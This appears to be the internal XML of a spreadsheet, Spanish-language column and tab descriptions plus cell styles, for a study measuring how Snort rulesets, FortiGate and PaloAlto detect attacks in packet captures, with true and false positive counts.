    <t xml:space="preserve"> para cada RS de Snort, número de mensajes de red con ataque detectados por el RuleSet. Para este cálculo, se cuenta el número total de paquetes diferentes dentro de los logs de alertas</t>
  </si>
  <si>
    <t>para el RS1 de Snort, número de instancias de ataque totales detectadas. Para este cálculo, se cuenta el número total de alertas dentro de los logs de alertas.</t>
  </si>
  <si>
    <t>para cada RS de Snort, número de flujos con ataques manualmente calificados como TP detectados por el RuleSet</t>
  </si>
  <si>
    <t>para cada RS de Snort, número de mensajes de red con ataques manualmente calificados como TP detectados por el RuleSet</t>
  </si>
  <si>
    <t>para cada RS de Snort, número de instancias de ataques calificadas manualmente como TP totales detectadas</t>
  </si>
  <si>
    <t xml:space="preserve"> para cada RS de Snort, número de flujos con ataques automáticamente calificados como TP detectados por el RuleSet. Para el cálculo, se discriminan todas aquellas alertas cuyo SID se encuentre también en los SIDs de tráfico legítimo</t>
  </si>
  <si>
    <t>para cada RS de Snort, número de mensajes con ataques automáticamente calificados como TP detectados por el RuleSet. Para el cálculo, se discriminan todas aquellas alertas cuyo SID se encuentre también en los SIDs de tráfico legítimo</t>
  </si>
  <si>
    <t>para el RS1 de Snort, número de instancias de ataques automáticamente calificadas como TP detectadas por el RuleSet. Para el cálculo, se discriminan todas aquellas alertas cuyo SID se encuentre también en los SIDs de tráfico legítimo</t>
  </si>
  <si>
    <t>para cada RS, número de flujos con ataques detectados entre número de flujos con ataques de la captura</t>
  </si>
  <si>
    <t>para cada RS, número de flujos con ataques TP filtrados automáticamente detectados entre número de flujos con ataques de la captura</t>
  </si>
  <si>
    <t>para cada RS, número de flujos con ataques TP filtrados manualmente detectados entre número de flujos con ataques de la captura</t>
  </si>
  <si>
    <t>para cada RS, número de mensajes con ataques detectados entre número de mensajes con ataques de la captura</t>
  </si>
  <si>
    <t>para cada RS, número de mensajes con ataques TP filtrados automáticamente detectados entre número de mensajes con ataques de la captura</t>
  </si>
  <si>
    <t>para cada RS, número de mensajes con ataques TP filtrados manualmente detectados entre número de mensajes con ataques de la captura</t>
  </si>
  <si>
    <t>para el RS1, número de instancias de ataques detectadas entre número de instancias de ataques de la captura</t>
  </si>
  <si>
    <t>para el RS1, número de instancias de ataques TP filtrados automáticamente detectas entre número de instancias de ataques de la captura</t>
  </si>
  <si>
    <t>para los RS2, RS3 y RS4, número de instancias de ataques detectadas calculadas manualmente entre número de instancias de ataques en la captura</t>
  </si>
  <si>
    <t>para cada RS2 y RS4 de Snort, número de flujos totales analizados por Snortv2</t>
  </si>
  <si>
    <t>para los RS2, RS3 y RS4 número de instancias de ataque totales detectadas por el paquete de reglas de Talos respectivo</t>
  </si>
  <si>
    <t>para los RS2, RS3 y RS4 número de instancias de ataque totales detectadas por el paquete de reglas de ETOpen respectivo</t>
  </si>
  <si>
    <t>para los RS2, RS3 y RS4, número de instancias de ataques automáticamente calificadas como TP detectadas por el paquete de reglas Talos respectivo. Para el cálculo, se discriminan todas aquellas alertas cuyo SID se encuentre también en los SIDs de tráfico legítimo</t>
  </si>
  <si>
    <t xml:space="preserve"> para los RS2, RS3 y RS4, número de instancias de ataques automáticamente calificadas como TP detectadas por el paquete de reglas ETOpen respectivo. Para el cálculo, se discriminan todas aquellas alertas cuyo SID se encuentre también en los SIDs de tráfico legítimo</t>
  </si>
  <si>
    <t>para los RS2, RS3 y RS4, número de instancias de ataques automáticamente calificadas como TP detectadas en total. Para el cálculo, se discriminan todas aquellas alertas cuyo SID se encuentre también en los SIDs de tráfico legítimo así como se realiza una puesta en conjunto manual para asociar las alertas de cada paquete de reglas a una instancia.</t>
  </si>
  <si>
    <t>para los RS2, RS3 y RS4, número de instancias de ataques TP filtrados automáticamente y calculados manualmente entre número de instancias de ataques de la captura</t>
  </si>
  <si>
    <t>para cada RS, número de instancias de ataques TP filtrados manualmente detectadas entre número de instancias de ataques de la captura</t>
  </si>
  <si>
    <t>para cada RS, porcentaje de detección eficaz de flujos. Esto es el número de flujos detectados, ya sean principales o colaterales</t>
  </si>
  <si>
    <t>para cada RS, porcentaje de detección del ataque. Esta celda valdrá 100% si el ataque contiene al menos una alerta válida (TP o colateral) o 0% en caso contrario</t>
  </si>
  <si>
    <t xml:space="preserve"> para cada ataque, esta columna indica si se ha podido realizar el análisis manual basado en flujos, mensajes e instancias. Debido a la existencia de pcaps de gran tamaño y que por consiguiente pueden generar un gran número de alertas, su manejo y clasificación puede resultar inabordable, por lo que se deja indicado en esta columna. Aquellos ataques con una ✘ en esta celda no serán contemplados para los registros manuales (además disponen de "-" en los apartados manuales)</t>
  </si>
  <si>
    <t>es posible que en determinados casos resulte necesario añadir comentarios acerca de un ataque en particular. En esta columna podrá encontrar dichos comentarios para el caso de Snort.</t>
  </si>
  <si>
    <t xml:space="preserve"> para FortiGate, muestra la lista de los attackids devueltos por la detección de FortiGate para un ataque concreto</t>
  </si>
  <si>
    <t>para FortiGate, número de attackids diferentes</t>
  </si>
  <si>
    <t>para Fortigate, número total de alertas (con repetición) generadas por Fortigate.</t>
  </si>
  <si>
    <t>para FortiGate, attackids que aparecen tanto en la captura del ataque como en el dataset legitimo XX</t>
  </si>
  <si>
    <t>para FortiGate, número de attackids que aparecen tanto en la captura del ataque como en el dataset legitimo XX</t>
  </si>
  <si>
    <t>attackids que han sido considerados como FP de forma manual</t>
  </si>
  <si>
    <t>attackids que han sido considerados como FP de forma automática, es decir, en base a los attackids que han aparecido también en el tráfico legítimo</t>
  </si>
  <si>
    <t>attackids que han sido considerados como TP de forma manual</t>
  </si>
  <si>
    <t>attackids que han sido considerados como TP de forma automática, es decir, aquellos que no han aparecido en las detecciones del tráfico legítimo.</t>
  </si>
  <si>
    <t>para FortiGate, Attackids considerados como FP totales. Para esta columna se usará siempre que se haya podido efectuar el análisis manual los attackids que aparezcan en la columna "Attackids FP (Manual)". En su defecto se usarán los valores del análisis automático.</t>
  </si>
  <si>
    <t xml:space="preserve"> número de attackids FP que han acabado identificándose.</t>
  </si>
  <si>
    <t>appids de las alertas de control de aplicaciones que saltan para el ataque estudiado</t>
  </si>
  <si>
    <t>es posible que en determinados casos resulte necesario añadir comentarios acerca de un ataque en particular. En esta columna podrá encontrar dichos comentarios para el caso de FortiGate</t>
  </si>
  <si>
    <t>SI o NO dependiendo de si el ataque se encuentra en el rango de acción del IDS. Por lo general, se aplica SI a ataques L3 y NO a ataques L2</t>
  </si>
  <si>
    <t>número de sessionids diferentes que aparecen en el log generado para un ataque. Este parámetro sirve para identificar el número total de flujos detectados por FortiGate.</t>
  </si>
  <si>
    <t xml:space="preserve">número total de flujos ya sea de ataques o considerados por el motor de aplicaciones y que identifican correctamente el ataque </t>
  </si>
  <si>
    <t>número de flujos con ataque (sessionids) detectados por los motores de ataque de FortiGate</t>
  </si>
  <si>
    <t>número de flujos con ataque (sessionids) detectados por los motores de aplicación de FortiGate (y que identifican el ataque correctamente)</t>
  </si>
  <si>
    <t>número de flujos (ya sean principales o colaterales) para los que se ha generado una alerta TP válida</t>
  </si>
  <si>
    <t>número de flujos con ataque detectados por FortiGate entre número de flujos con ataque en la captura</t>
  </si>
  <si>
    <t>porcentaje de detección eficaz de flujos. Se calcula dividiendo el número de flujos con ataque eficazmente detectados entre el número total de flujos con ataque (principales + colaterales)</t>
  </si>
  <si>
    <t>porcentaje de detección eficaz de ataque. Valdrá 100% si hay al menos un flujo de ataque detectado eficazmente. Valdrá 0% en caso contrario</t>
  </si>
  <si>
    <t>para PaloAlto, muestra la lista de los threat_ids devueltos por la detección de PaloAlto para un ataque concreto</t>
  </si>
  <si>
    <t>para PaloAlto, número de threat_ids diferentes</t>
  </si>
  <si>
    <t>para PaloAlto, número total de alertas (con repetición) generadas por Fortigate.</t>
  </si>
  <si>
    <t>para PaloAlto, threat_ids que aparecen tanto en la captura del ataque como en el dataset legitimo XX</t>
  </si>
  <si>
    <t>para PaloAlto, número de threat_ids que aparecen tanto en la captura del ataque como en el dataset legitimo XX</t>
  </si>
  <si>
    <t>threat_ids que han sido considerados como TP de forma manual</t>
  </si>
  <si>
    <t xml:space="preserve"> threat_ids que han sido considerados como FP de forma manual</t>
  </si>
  <si>
    <t>para PaloAlto, threat_ids considerados como FP totales. Para esta columna se usará siempre que se haya podido efectuar el análisis manual los threat_ids que aparezcan en la columna "threat_ids FP (Manual)". En su defecto se usarán los valores del análisis automático.</t>
  </si>
  <si>
    <t>número de threat_ids FP que han acabado identificándose.</t>
  </si>
  <si>
    <t xml:space="preserve"> es posible que en determinados casos resulte necesario añadir comentarios acerca de un ataque en particular. En esta columna podrá encontrar dichos comentarios para el caso de PaloAlto</t>
  </si>
  <si>
    <t>número de sessionids diferentes que aparecen en el log generado para un ataque. Este parámetro sirve para identificar el número total de flujos detectados por PaloAlto.</t>
  </si>
  <si>
    <t>número de sessionids diferentes que tienen asociado un threat_id en el log generado por PaloAlto.</t>
  </si>
  <si>
    <t>número de flujos con ataque detectados por PaloAlto entre número de flujos con ataque en la captura</t>
  </si>
  <si>
    <t>✔ o ✘ en función de si los resultados obtenidos para un ataque acaban siendo usados para elaborar los análisis finales o no. Esta decisión se basa en parámetros como la detectabilidad, si es detectable por patrones y si se ha producido algún error en la reproducción de paquetes</t>
  </si>
  <si>
    <t>↓</t>
  </si>
  <si>
    <t>La suma de los SIDs en estas dos columnas constituye el total de SIDs que han sido calificados como TP en el método de identificación de alertas manual. Cabe recalcar que la segunda columna se encuentra vacía en este estudio, pero podría ser de utilidad en algún ataque futuro</t>
  </si>
  <si>
    <t>(C) - DETECCIONES TRÁFICO LEGÍTIMO</t>
  </si>
  <si>
    <t>SIDs en Tráfico legítimo (RS1, RS2, RS3, RS4, FortiGate, PaloAlto)</t>
  </si>
  <si>
    <t>#SIDs en Tráfico legítimo (RS1, RS2, RS3, RS4, FortiGate, PaloAlto)</t>
  </si>
  <si>
    <t>Nombre del fichero pcap correspondiente a la captura de tráfico legítimo</t>
  </si>
  <si>
    <t>Clasifica la captura de tráfico (por lo general será REAL)</t>
  </si>
  <si>
    <t>Dataset al que pertenece la captura de paquetes</t>
  </si>
  <si>
    <t>Tamaño del fichero PCAP</t>
  </si>
  <si>
    <t>Número de flujos totales calculados con la herramienta tranalyzer del fichero PCAP</t>
  </si>
  <si>
    <t>Nº de direcciones IP distintas que aparecen en la captura de paquetes</t>
  </si>
  <si>
    <t>SIDs que ha generado el IDS correspondiente (para el RuleSet correspondiente en caso de Snort) para la detección del fichero PCAP</t>
  </si>
  <si>
    <t>Nº SIDs que ha generado el IDS correspondiente (para el RuleSet correspondiente en caso de Snort) para la detección del fichero PCAP</t>
  </si>
  <si>
    <t>Indica si dentro de la captura hay al menos un flujo incompleto, por la falta del SYN inicial</t>
  </si>
  <si>
    <t>(D) - ANÁLISIS RESULTADOS I - SNORT</t>
  </si>
  <si>
    <t>Registros Totales - Porcentajes Promedio</t>
  </si>
  <si>
    <t>Registros Particulares - Valores Absolutos (Táctica / Técnica)</t>
  </si>
  <si>
    <t>Registros Particulares - Porcentajes Totales (Táctica / Técnica)</t>
  </si>
  <si>
    <t>Registros Particulares - Porcentajes Promedio (Táctica / Técnica)</t>
  </si>
  <si>
    <t>Alertas Totales (SIDs)</t>
  </si>
  <si>
    <t>TP Totales (SIDs)</t>
  </si>
  <si>
    <t>Este registro concierne al número exclusivo de reglas (reglas que no aparecen en ningún otro paquete de reglas) de cada uno de los paquetes que intervienen en el estudio. Contiene un gráfico de cascada.</t>
  </si>
  <si>
    <t>Este registro almacena sumas y cálculos totales, sin hacer uso de porcentajes, para todos los datos del estudio (sin atender a categorías del estilo táctica o técnica)</t>
  </si>
  <si>
    <t>Este registro almacena porcentajes relativos a los valores absolutos de todos los datos del estudio (sin atender a categorías del estilo táctica o técnica)</t>
  </si>
  <si>
    <t>Este registro almacena porcentajes obtenidos a partir de promedios calculados directamente de los valores de la pestaña (B) - Detecciones - Ataques. Los promedios se realizan sobre todos los datos del estudio (sin atender a categorías del estilo táctica o técnica)</t>
  </si>
  <si>
    <t>Este registro almacena sumas y cálculos totales, sin hacer uso de porcentajes, para todos los datos del estudio, clasificándolos por táctica o técnica según corresponda</t>
  </si>
  <si>
    <t>Este registro almacena porcentajes relativos a los valores absolutos de todos los datos del estudio, clasificándolos por táctica o técnica según corresponda</t>
  </si>
  <si>
    <t>Este registro almacena porcentajes obtenidos a partir de promedios calculados directamente de los valores de la pestaña (B) - Detecciones - Ataques. Los promedios se realizan sobre todos los datos del estudio, clasificándolos por táctica o técnica según corresponda</t>
  </si>
  <si>
    <t>Este registro recoge para cada RuleSet y Táctica el número de técnicas que han generado al menos un TP</t>
  </si>
  <si>
    <t>Este registro recoge para cada RuleSet y Táctica el número de ataques que han generado al menos un TP</t>
  </si>
  <si>
    <t>Este registro recoge para cada RuleSet y táctica el número de SIDs diferentes generados para cada ataque (sumados en caso de existir más de un ataque por combinación)</t>
  </si>
  <si>
    <t>Este registro recoge para cada RuleSet y táctica el número de SIDs calificados como TP</t>
  </si>
  <si>
    <t>(D) - ANÁLISIS RESULTADOS II - FORTIGATE</t>
  </si>
  <si>
    <t>esta tabla muestra el número de alertas totales que son consideradas como TP para cada táctica</t>
  </si>
  <si>
    <t>esta tabla muestra el número de alertas promedio que son consideradas como TP y que se generan para cada ataque dentro de una táctica</t>
  </si>
  <si>
    <t>esta tabla muestra el porcentaje de efectividad que presentan las alertas generadas para cada táctica, calculadas dividiendo el número de TPs entre el número de alertas totales</t>
  </si>
  <si>
    <t>(D) - ANÁLISIS RESULTADOS III - PALOALTO</t>
  </si>
  <si>
    <t>(D) - ANÁLISIS RESULTADOS IV - CONJUNTO</t>
  </si>
  <si>
    <t>Comparación Snort vs FG</t>
  </si>
  <si>
    <t>Comparación Snort vs PA</t>
  </si>
  <si>
    <t>esta tabla muestra diferentes contadores y gráficas acerca de las categorías que intervienen en el estudio</t>
  </si>
  <si>
    <t>este registro compara en diferentes secciones los resultados obtenidos a nivel de flujos por Snort y FG, para totales, tácticas y técnicas</t>
  </si>
  <si>
    <t>este registro compara en diferentes secciones los resultados obtenidos a nivel de flujos por Snort y PA, para totales, tácticas y técnicas</t>
  </si>
  <si>
    <t>(E) - REFERENCIAS</t>
  </si>
  <si>
    <t>Tabla de Referencias</t>
  </si>
  <si>
    <t>esta tabla resume las diferentes fuentes de los datos que intervienen en el estudio</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</si>
</sst>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d/mm/yyyy"/>
    <numFmt numFmtId="165" formatCode="0.0000%"/>
  </numFmts>
  <fonts count="66">
    <font>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font/>
    <font>
      <b/>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="&quot;Google Sans&quot;"/>
    </font>
    <font>
      <b/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="13.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="13.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color theme="7"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF6AA84F"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color rgb="FF34A853"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF434343"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color rgb="FF57BB8A"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color rgb="FF1F1F1F"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="7"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF0000FF"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF57BB8A"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF0000FF"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="13.0"/>
      <color theme="1"/>
      <name val="Fugaz One"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Fugaz One"/>
    </font>
    <font>
      <sz val="13.0"/>
      <color theme="1"/>
      <name val="Fugaz One"/>
    </font>
    <font>
      <strike/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="14.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="12.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="13.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="15.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="10.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="13.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="12.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="18.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="12.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Calibri"/>
    </font>
    <font>
      <b/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="12.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="12.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="14.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <b/>
      <sz val="18.0"/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="22">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="lightGray"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFF2CC"/>
        <bgColor rgb="FFFFF2CC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFE599"/>
        <bgColor rgb="FFFFE599"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFD966"/>
        <bgColor rgb="FFFFD966"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF1C232"/>
        <bgColor rgb="FFF1C232"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF4A86E8"/>
        <bgColor rgb="FF4A86E8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE6E6E6"/>
        <bgColor rgb="FFE6E6E6"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFDAF1F3"/>
        <bgColor rgb="FFDAF1F3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9D9D9"/>
        <bgColor rgb="FFD9D9D9"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFB6D7A8"/>
        <bgColor rgb="FFB6D7A8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF9FC5E8"/>
        <bgColor rgb="FF9FC5E8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEFEFEF"/>
        <bgColor rgb="FFEFEFEF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFFF"/>
        <bgColor rgb="FFFFFFFF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFCCCCCC"/>
        <bgColor rgb="FFCCCCCC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF3F3F3"/>
        <bgColor rgb="FFF3F3F3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF6D01"/>
        <bgColor rgb="FFFF6D01"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="6"/>
        <bgColor theme="6"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFD9E7FD"/>
        <bgColor rgb="FFD9E7FD"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFDFD"/>
        <bgColor rgb="FFFFFDFD"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFCFC"/>
        <bgColor rgb="FFFFFCFC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF000000"/>
        <bgColor rgb="FF000000"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="54">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border>
    <border>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
    </border>
    <border>
      <left style="thick">
        <color rgb="FF000000"/>
      </left>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thick">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thick">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thick">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="thick">
        <color rgb="FF000000"/>
      </left>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thick">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
    </border>
    <border>
      <left style="thick">
        <color rgb="FF000000"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <right style="thick">
        <color rgb="FF000000"/>
      </right>
      <top style="thick">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF000000"/>
      </left>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <right style="medium">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF000000"/>
      </left>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <right style="medium">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF000000"/>
      </left>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
    </border>
    <border>
      <right style="medium">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF000000"/>
      </left>
    </border>
    <border>
      <right style="medium">
        <color rgb="FF000000"/>
      </right>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <top style="thin">
        <color rgb="FF000000"/>
      </top>
      <bottom style="thin">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF000000"/>
      </left>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <right style="medium">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF000000"/>
      </left>
      <right style="thin">
        <color rgb="FF000000"/>
      </right>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF000000"/>
      </left>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <right style="medium">
        <color rgb="FF000000"/>
      </right>
      <bottom style="medium">
        <color rgb="FF000000"/>
      </bottom>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF000000"/>
      </left>
      <right style="medium">
        <color rgb="FF000000"/>
      </right>
      <top style="medium">
        <color rgb="FF000000"/>
      </top>
    </border>
    <border>
